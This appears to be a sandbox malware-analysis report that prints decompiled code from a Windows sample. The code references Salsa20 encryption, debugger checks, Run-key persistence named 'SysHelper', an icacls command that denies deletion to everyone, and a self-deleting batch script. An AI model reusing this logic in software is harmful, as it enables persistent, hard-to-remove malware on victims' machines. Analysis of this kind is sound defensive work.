0x0040c25d
0x0040c264
0x0040c267
0x0040c26a
0x0040c26d
0x0040c270
0x0040c275
0x0040c278
0x0040c27e
0x0040c283
0x0040c286
0x0040c289
0x0040c28e
0x0040c291
0x0040c298
0x0040c29b
0x0040c29e
0x0040c2a1
0x0040c2a6
0x0040c2a9
0x0040c2ab
0x0040c2ad
0x0040c2b3
0x0040c2b9
0x0040c2bc
0x0040c2c2
0x0040c2c8
0x0040c2cb
0x0040c2cd
0x0040c2d0
0x0040c2d6
0x0040c2d9
0x0040c2de
0x0040c2e1
0x0040c2e6
0x0040c2e9
0x0040c2eb
0x0040c2eb
0x0040c2ee
0x0040c2ee
0x0040c2f7
0x0040c2fa
0x0040c2fc
0x0040c2ff
0x0040c302
0x0040c305
0x0040c308
0x0040c310
0x0040c319
0x0040c31e
0x0040c322
0x0040c32b
0x0040c330
0x0040c337
0x0040c340
0x0040c342
0x0040c345
0x0040c345
0x0040c34a
0x0040c352
0x0040c357
0x0040c35d
0x0040c368
0x0040c36b
0x0040c36f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c371
0x0040c371
0x0040c378
0x0040c379
0x0040c37b
0x0040c37c
0x0040c37e
0x0040c37f
0x0040c380
0x0040c384
0x0040c387
0x0040c38a
0x0040c38d
0x0040c38d
0x0040c390
0x00000000
0x0040c398
0x0040c39e

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

input != nullptr && output != nullptr, xrefs: 0040C095
e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E00424168(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				char _v800;
				signed int _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t41;
				char* _t46;
				char* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t59 = __ebx;
				_t41 =  *0x50ad20; // 0x727261cc
				_t42 = _t41 ^ _t69;
				_v8 = _t41 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t42);
					_pop(_t60);
				}
				_v804 = _v804 & 0x00000000;
				E0042B420( &_v800, 0, 0x4c);
				_v812 =  &_v804;
				_t46 =  &_v724;
				_v808 = _t46;
				_v548 = _t46;
				_v552 = _t60;
				_v556 = _t65;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t23);
				_v540 = _v0;
				_t48 =  &_v0;
				_v528 = _t48;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t48 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				if(E004329EC( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t55);
				}
				return E0042A77E(_t59, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00424168
0x00424168
0x00424168
0x00424171
0x00424176
0x00424178
0x00424180
0x00424182
0x00424185
0x0042418a
0x0042418a
0x0042418b
0x0042419d
0x004241ab
0x004241b1
0x004241b7
0x004241bd
0x004241c3
0x004241c9
0x004241cf
0x004241d5
0x004241db
0x004241e1
0x004241e8
0x004241ef
0x004241f6
0x004241fd
0x00424204
0x0042420b
0x0042420c
0x00424215
0x0042421b
0x0042421e
0x00424224
0x00424231
0x0042423a
0x00424243
0x0042424c
0x00424258
0x00424269
0x00424275
0x00424278
0x0042427d
0x0042428c

APIs

_memset.LIBCMT ref: 0042419D
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252

Strings

i;B, xrefs: 00424168

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: DebuggerPresent_memset
String ID: i;B
API String ID: 2328436684-472376889
Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59

Uniqueness

Uniqueness Score: -1.00%

Function 004329EC Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004329EC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x004329f1
0x00432a01

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00424266,?,?,?,00000001), ref: 004329F1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004329FA

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction ID: d7915fe9b98f2e2675b1eb18c11ae3c40c3bb41b36f5f7d781b256b54fe46c91
Opcode Fuzzy Hash: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction Fuzzy Hash: A7B09271044208ABDA802B93EC59F883F28EB04A62F084022F60D444628F6254508E99

Uniqueness

Uniqueness Score: -1.00%

Function 004387C8 Relevance: 1.5, APIs: 1, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E004387C8(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				signed int _t6;
				int _t8;

				_t5 =  *0x5292d8; // 0x603271c
				_t6 = _t5 ^  *0x50ad20;
				if(_t6 == 0) {
					 *0x511344 = _a4;
					_t8 = EnumSystemLocalesW(E004387B4, 1);
					 *0x511344 =  *0x511344 & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}

0x004387cb
0x004387d0
0x004387d6
0x004387f1
0x004387f6
0x004387fc
0x00438804
0x004387d8
0x004387e6
0x004387e6

APIs

EnumSystemLocalesW.KERNEL32(004387B4,00000001,?,004376BC,0043775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004387F6

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
Instruction ID: e2c19f37e5f1fa56fd16d2c75426893bf8b780345540c0397aa12dc95392e8cd
Opcode Fuzzy Hash: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
Instruction Fuzzy Hash: 4DE08C32150308FBCF21CFA0EC41FD83BA6BB58710F104419F61C4AA60CB71A964EB48

Uniqueness

Uniqueness Score: -1.00%

Function 0043884E Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,20001004,?,0042580F,?,0042580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00438875

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
Instruction ID: 4201596fe771204303fc80694ffa3c51b65a798dd9aa63856d52ff29377aa1ed
Opcode Fuzzy Hash: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
Instruction Fuzzy Hash: 7ED0173200020CFF8F01AFE1EC45C6A7B69FF0C314B180409FA1C45120DA36A820EB25

Uniqueness

Uniqueness Score: -1.00%

Function 004329BB Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004329BB(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x004329c8

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00431DA6,00431D5B), ref: 004329C1

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction ID: cc44753b31e70f30ed06b04cde14f86973f8491ae5a0d649e7a5859f7922213d
Opcode Fuzzy Hash: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction Fuzzy Hash: 69A0113000020CAB8A002B83EC088883F2CEA002A0B088022F80C008228B22A8208E88

Uniqueness

Uniqueness Score: -1.00%

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00411CD0(void* __ebx, void* __edx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v16;
				WCHAR* _v24;
				void* _v28;
				void* _v32;
				int _v36;
				intOrPtr _v40;
				WCHAR* _v44;
				char _v60;
				int _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				int _v92;
				intOrPtr _v96;
				WCHAR* _v100;
				char _v116;
				intOrPtr _v120;
				char _v140;
				struct _PROCESS_INFORMATION _v156;
				char _v172;
				struct _STARTUPINFOW _v248;
				short _v2296;
				char _v4342;
				short _v4344;
				char _v6390;
				char _v6392;
				short _v8440;
				short _v12536;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t124;
				intOrPtr _t133;
				_Unknown_base(*)()* _t137;
				short _t150;
				intOrPtr _t160;
				long _t171;
				intOrPtr _t207;
				void* _t213;
				void* _t221;
				intOrPtr* _t223;
				signed int _t225;
				WCHAR* _t228;
				signed int _t230;
				intOrPtr* _t232;
				signed int _t234;
				intOrPtr* _t237;
				signed int _t239;
				intOrPtr _t242;
				void* _t245;
				WCHAR* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				void* _t253;
				void* _t257;
				intOrPtr _t263;
				void* _t264;
				void* _t266;

				_t221 = __ebx;
				_push(0xffffffff);
				_push(0x4cac68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t263;
				E0042F7C0(0x30e8);
				_push(_t253);
				_v32 = 0;
				_t250 = __edx;
				_t124 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v32);
				if(_t124 != 0) {
					L50:
					 *[fs:0x0] = _v16;
					return _t124;
				}
				_v6392 = _t124;
				_v36 = 1;
				E0042B420( &_v6390, _t124, 0x7fe);
				_t264 = _t263 + 0xc;
				_v64 = 0x400;
				RegQueryValueExW(_v32, L"SysHelper", 0,  &_v36,  &_v6392,  &_v64);
				RegCloseKey(_v32);
				_v40 = 7;
				_v44 = 0;
				_v60 = 0;
				if(_v6392 != 0) {
					_t223 =  &_v6392;
					_t245 = _t223 + 2;
					do {
						_t133 =  *_t223;
						_t223 = _t223 + 2;
					} while (_t133 != 0);
					_t225 = _t223 - _t245 >> 1;
					L6:
					_push(_t225);
					E00415C10(_t221,  &_v60, _t250, _t253,  &_v6392);
					_v8 = 0;
					_t255 = _v44;
					if(_v44 == 0) {
						L19:
						_v8 = 0xffffffff;
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_t137 = GetProcAddress(LoadLibraryW(L"Shell32.dll"), "SHGetFolderPathW");
						_t256 = _t137;
						_v92 = 0;
						lstrcpyW( &_v8440,  *(CommandLineToArgvW(GetCommandLineW(),  &_v92)));
						_v36 = PathFindFileNameW( &_v8440);
						 *_t137(0, 0x1c, 0, 0,  &_v2296);
						__imp__UuidCreate( &_v172);
						_v24 = 0;
						__imp__UuidToStringW( &_v172,  &_v24);
						_t246 = _v24;
						_v96 = 7;
						_v100 = 0;
						_v116 = 0;
						if( *_t246 != 0) {
							_t228 = _t246;
							_t57 =  &(_t228[1]); // 0x2
							_t256 = _t57;
							do {
								_t150 =  *_t228;
								_t228 =  &(_t228[1]);
							} while (_t150 != 0);
							_t230 = _t228 - _t256 >> 1;
							goto L26;
						} else {
							_t230 = 0;
							L26:
							E00415C10(_t221,  &_v116, _t250, _t256, _t246);
							_v8 = 1;
							__imp__RpcStringFreeW( &_v24, _t230);
							_t257 = PathAppendW;
							_t154 =  >=  ? _v116 :  &_v116;
							PathAppendW( &_v2296,  >=  ? _v116 :  &_v116);
							CreateDirectoryW( &_v2296, 0);
							if(_t250 == 0) {
								L33:
								_v68 = 7;
								_v72 = 0;
								_v88 = 0;
								if(_v2296 != 0) {
									_t232 =  &_v2296;
									_t247 = _t232 + 2;
									do {
										_t160 =  *_t232;
										_t232 = _t232 + 2;
									} while (_t160 != 0);
									_t234 = _t232 - _t247 >> 1;
									L38:
									_push(_t234);
									E00415C10(_t221,  &_v88, _t250, _t257,  &_v2296);
									_v8 = 2;
									PathAppendW( &_v2296, _v36);
									DeleteFileW( &_v2296);
									CopyFileW( &_v8440,  &_v2296, 0);
									_v28 = 0;
									_t171 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v28);
									if(_t171 != 0) {
										L45:
										if(_v68 >= 8) {
											L00422587(_v88);
											_t264 = _t264 + 4;
										}
										_t124 = 0;
										_v68 = 7;
										_v72 = 0;
										_v88 = 0;
										if(_v96 >= 8) {
											_push(_v116);
											L49:
											_t124 = L00422587();
										}
										goto L50;
									}
									_v4344 = _t171;
									E0042B420( &_v4342, _t171, 0x7fe);
									_t266 = _t264 + 0xc;
									lstrcpyW( &_v4344, "\"");
									lstrcatW( &_v4344,  &_v2296);
									lstrcatW( &_v4344, L"\" --AutoStart");
									RegSetValueExW(_v28, L"SysHelper", 0, 2,  &_v4344, lstrlenW( &_v4344) + _t183);
									RegCloseKey(_v28);
									_t236 = _a4;
									if(_a4 != 0) {
										E00413260(_t236, lstrcpyW,  &_v2296);
									}
									E0042B420( &_v248, 0, 0x44);
									_t264 = _t266 + 0xc;
									_v248.cb = 0x44;
									_v248.dwFlags = 1;
									_v248.wShowWindow = 0;
									SetLastError(0);
									lstrcpyW( &_v12536, L"icacls \"");
									_t194 =  >=  ? _v88 :  &_v88;
									lstrcatW( &_v12536,  >=  ? _v88 :  &_v88);
									lstrcatW( &_v12536, L"\" /deny *S-1-1-0:(OI)(CI)(DE,DC)");
									if(CreateProcessW(0,  &_v12536, 0, 0, 0, 0x48, 0, 0,  &_v248,  &_v156) != 0) {
										do {
										} while (WaitForSingleObject(_v156, 1) == 0x102);
									} else {
										GetLastError();
									}
									goto L45;
								}
								_t234 = 0;
								goto L38;
							}
							if(_v2296 != 0) {
								_t237 =  &_v2296;
								_t68 = _t237 + 2; // 0x2
								_t248 = _t68;
								do {
									_t207 =  *_t237;
									_t237 = _t237 + 2;
								} while (_t207 != 0);
								_t239 = _t237 - _t248 >> 1;
								L32:
								_push(_t239);
								E00415C10(_t221, _t250, _t250, _t257,  &_v2296);
								goto L33;
							}
							_t239 = 0;
							goto L32;
						}
					}
					_t213 = E00413520( &_v60,  &_v140, 1, _t255 - lstrlenA("\" --AutoStart") - 1);
					_t262 = _t213;
					if( &_v60 != _t213) {
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_v40 = 7;
						_v44 = 0;
						_v60 = 0;
						E004145A0( &_v60, _t262);
					}
					if(_v120 >= 8) {
						L00422587(_v140);
						_t264 = _t264 + 4;
					}
					_t216 =  >=  ? _v60 :  &_v60;
					_t124 = PathFileExistsW( >=  ? _v60 :  &_v60);
					if(_t124 == 0) {
						goto L19;
					} else {
						_t242 = _a4;
						if(_t242 != 0) {
							_t124 =  &_v60;
							if(_t242 != _t124) {
								_push(0xffffffff);
								_push(0);
								_t124 = E00414690(_t221, _t242, _t124);
							}
						}
						if(_v40 < 8) {
							goto L50;
						} else {
							_push(_v60);
							goto L49;
						}
					}
				}
				_t225 = 0;
				goto L6;
			}

0x00411cd0
0x00411cd9
0x00411cdb
0x00411ce0
0x00411ce6
0x00411ced
0x00411cf2
0x00411cf7
0x00411d10
0x00411d12
0x00411d1a
0x00412207
0x0041220b
0x00412216
0x00412216
0x00411d26
0x00411d34
0x00411d3b
0x00411d40
0x00411d43
0x00411d63
0x00411d6c
0x00411d74
0x00411d7b
0x00411d82
0x00411d8d
0x00411d93
0x00411d99
0x00411da0
0x00411da0
0x00411da3
0x00411da6
0x00411dad
0x00411daf
0x00411daf
0x00411dba
0x00411dbf
0x00411dc6
0x00411dcb
0x00411e7c
0x00411e7c
0x00411e87
0x00411e8c
0x00411e91
0x00411e91
0x00411ea5
0x00411eab
0x00411ead
0x00411ece
0x00411ee1
0x00411ef3
0x00411efc
0x00411f05
0x00411f14
0x00411f1a
0x00411f1f
0x00411f26
0x00411f2d
0x00411f34
0x00411f3a
0x00411f3c
0x00411f3c
0x00411f40
0x00411f40
0x00411f43
0x00411f46
0x00411f4d
0x00000000
0x00411f36
0x00411f36
0x00411f4f
0x00411f54
0x00411f5c
0x00411f64
0x00411f71
0x00411f77
0x00411f83
0x00411f8e
0x00411f96
0x00411fce
0x00411fd0
0x00411fd7
0x00411fde
0x00411fe9
0x00411fef
0x00411ff5
0x00412000
0x00412000
0x00412003
0x00412006
0x0041200d
0x0041200f
0x0041200f
0x0041201a
0x0041201f
0x0041202d
0x00412036
0x0041204c
0x00412055
0x0041206e
0x00412076
0x004121d1
0x004121d5
0x004121da
0x004121df
0x004121df
0x004121e2
0x004121e4
0x004121ef
0x004121f6
0x004121fa
0x004121fc
0x004121ff
0x004121ff
0x00412204
0x00000000
0x004121fa
0x00412082
0x00412090
0x004120a1
0x004120aa
0x004120c0
0x004120ce
0x004120f3
0x004120fc
0x00412102
0x00412107
0x00412110
0x00412110
0x00412120
0x00412125
0x00412128
0x00412134
0x0041213e
0x00412146
0x00412158
0x00412161
0x0041216d
0x0041217b
0x004121a8
0x004121c0
0x004121ca
0x004121aa
0x004121aa
0x004121aa
0x00000000
0x004121a8
0x00411feb
0x00000000
0x00411feb
0x00411fa0
0x00411fa6
0x00411fac
0x00411fac
0x00411fb0
0x00411fb0
0x00411fb3
0x00411fb6
0x00411fbd
0x00411fbf
0x00411fbf
0x00411fc9
0x00000000
0x00411fc9
0x00411fa2
0x00000000
0x00411fa2
0x00411f34
0x00411dec
0x00411df1
0x00411df8
0x00411dfe
0x00411e03
0x00411e08
0x00411e08
0x00411e0d
0x00411e18
0x00411e1f
0x00411e23
0x00411e23
0x00411e2c
0x00411e34
0x00411e39
0x00411e39
0x00411e43
0x00411e48
0x00411e50
0x00000000
0x00411e52
0x00411e52
0x00411e57
0x00411e59
0x00411e5e
0x00411e60
0x00411e62
0x00411e65
0x00411e65
0x00411e5e
0x00411e6e
0x00000000
0x00411e74
0x00411e74
0x00000000
0x00411e74
0x00411e6e
0x00411e50
0x00411d8f
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32 ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32 ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32 ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

Shell32.dll, xrefs: 00411E94
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
SysHelper, xrefs: 00411D5B, 004120EB
" --AutoStart, xrefs: 00411DD1
icacls ", xrefs: 0041214C
D, xrefs: 00412128
SHGetFolderPathW, xrefs: 00411E9F
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
" --AutoStart, xrefs: 004120C2

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: 2830f4d22bb4cc6c66c95b42a458652ef167f5d2173bbe45734798a70efe51a0
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: 2830f4d22bb4cc6c66c95b42a458652ef167f5d2173bbe45734798a70efe51a0
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004124E0() {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				char _v364;
				char _v628;
				void _v1668;
				char _v1932;
				char _v2956;
				long _t40;
				signed int _t48;
				void* _t78;
				intOrPtr _t79;
				int _t104;
				long _t106;
				int _t108;
				void* _t110;
				intOrPtr* _t113;
				void* _t115;

				if( *0x513234 == 0) {
					 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
					_t40 = GetLastError();
					_push( *0x513230);
					if(_t40 != 0xb7) {
						CloseHandle();
						 *0x513230 = 0;
						goto L7;
					} else {
						_t104 = CloseHandle();
						 *0x513230 = 0;
						return _t104;
					}
				} else {
					 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
					_t106 = GetLastError();
					_push( *0x513238);
					if(_t106 != 0xb7) {
						CloseHandle();
						 *0x513238 = 0;
						L7:
						if(E00412360() == 0) {
							GetModuleFileNameA(0,  &_v628, 0x104);
							GetShortPathNameA( &_v628,  &_v628, 0x104);
							_t48 = GetEnvironmentVariableA("TEMP",  &_v1932, 0x104);
							asm("sbb eax, eax");
							lstrcpyA( &_v364, _t48 &  &_v1932);
							lstrcatA( &_v364, "\\");
							lstrcatA( &_v364, "delself.bat");
							lstrcpyA( &_v1668, "@echo off\r\n:try\r\ndel \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\"\r\nif exist \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\" goto try\r\n");
							lstrcatA( &_v1668, "del \"");
							lstrcatA( &_v1668,  &_v364);
							lstrcatA( &_v1668, "\"");
							if(PathFileExistsA( &_v364) != 0) {
								DeleteFileA( &_v364);
							}
							_t78 = CreateFileA( &_v364, 0xc0000000, 3, 0, 2, 0x80, 0);
							_t113 =  &_v1668;
							_t110 = _t78;
							_t115 = _t113 + 1;
							do {
								_t79 =  *_t113;
								_t113 = _t113 + 1;
							} while (_t79 != 0);
							WriteFile(_t110,  &_v1668, _t113 - _t115,  &_v8, 0);
							FlushFileBuffers(_t110);
							CloseHandle(_t110);
							E0042B420( &_v100, 0, 0x44);
							_v100.cb = 0x44;
							_v100.dwFlags = 1;
							_v100.wShowWindow = 0;
							SetLastError(0);
							lstrcpyA( &_v2956, "\"");
							lstrcatA( &_v2956,  &_v364);
							lstrcatA( &_v2956, "\"");
							CreateProcessA(0,  &_v2956, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
							CloseHandle(_v24.hThread);
							return CloseHandle(_v24);
						} else {
							return E00412440();
						}
					} else {
						_t108 = CloseHandle();
						 *0x513238 = 0;
						return _t108;
					}
				}
			}

0x004124f3
0x00412556
0x0041255b
0x00412561
0x0041256c
